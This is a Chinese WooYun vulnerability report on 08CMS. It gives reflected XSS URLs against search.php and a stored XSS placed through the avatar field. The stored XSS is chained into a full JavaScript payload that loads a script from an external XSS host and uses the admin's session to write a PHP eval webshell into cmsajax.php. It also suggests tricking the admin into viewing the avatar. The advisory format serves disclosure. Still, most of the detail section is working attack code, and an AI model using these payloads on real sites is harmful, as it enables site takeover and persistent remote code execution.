当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(5) 关注此漏洞

缺陷编号: WooYun-2013-44261

漏洞标题: 08cms存储型XSS可getshell(较鸡肋)

相关厂商: 08CMS

漏洞作者: redrain有节操

提交时间: 2013-11-28 15:05

公开时间: 2014-01-12 15:06

漏洞类型: XSS 跨站脚本攻击

危害等级: 高

自评Rank: 15

漏洞状态: 未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 持久型xss

0人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-11-28: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-01-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

用户在前台构造xss,管理在后台直接getshell

详细说明:

赠送几个反射型:

搜索处存在反射性xss

code 区域
/search.php?caid=2&ccid1=208&chid=4&djfrom=1&djto=1<ScRiPt%2520>prompt(968256)</sCripT>





code 区域
/search.php?caid=2&ccid1=208&chid=4&djfrom=1<ScRiPt%2520>prompt(981700)</sCripT>





code 区域
/search.php?caid=4&chid=2&mchid=1&zjfrom=1<ScRiPt%2520>prompt(966559)</sCripT>





code 区域
/search.php?caid=4&chid=2&mchid=1&zjfrom=1&zjto=1<ScRiPt%2520>prompt(922207)</sCripT>





用户在前台修改头像的时候发现可以外部调用,仅仅是检查了后缀,然后在附件的地方插入

http://xxx.com/"><script>alert(1)</script>adminc/images/logo_member.png

返回我的首页,发现成功的触发了xss



再插入

http://xxx.com/"><script src="http://xxx.js"></script><img src="http://www.baidu.com/img/bdlogo.gif





管理员后台查看后(可和管理反应,哎呀,我的头像有问题啊,之类的),成功地触发了成功的getshell cmsajax.php 密码fuckhelen



getshell的payload如下:

code 区域
document.writeln("<script src=http://xss.tw/5237></script>");


function ajax(){


	var request = false;


	if(window.XMLHttpRequest) {


		request = new XMLHttpRequest();


	} else if(window.ActiveXObject) {


		var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];


		for(var i=0; i<versions.length; i++) {


			try {


				request = new ActiveXObject(versions[i]);


			} catch(e) {}


		}


	}


	return request;


}


var _x = ajax();


postgo();


function postgo() {


	src="/admina.php?entry=csstpls&action=filedetail&filename=cmsajax.php&jsmode=1&forward=";


	data="contentnew=%3C%3Fphp+eval%28%24_POST%5Bfuckhelen%5D%29%3B+%3F%3E&bfiledetail=%CC%E1%BD%BB";


	xhr_act("POST",src,data);


	}


function xhr_act(_m,_s,_a){


	_x.open(_m,_s,false);


	if(_m=="POST")_x.setRequestHeader("Content-Type","application/x-www-form-urlencoded");


	_x.send(_a);


	return _x.responseText;


}



漏洞证明:

1.png



2.png

修复方案:

版权声明:转载请注明来源 redrain有节操@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2013-11-28 20:00 | 猪头子 ( 普通白帽子 | Rank:189 漏洞数:35 | 自信的看着队友rm -rf/tar挂服务器)
    0

    wow!!!好酷炫!!!

    1# 回复此人
  2. 2014-01-12 18:36 | saline ( 普通白帽子 | Rank:294 漏洞数:37 | Focus On Web Secur1ty)
    0

    wow!!!好酷炫!!!

    2# 回复此人

登录后才能发表评论,请先 登录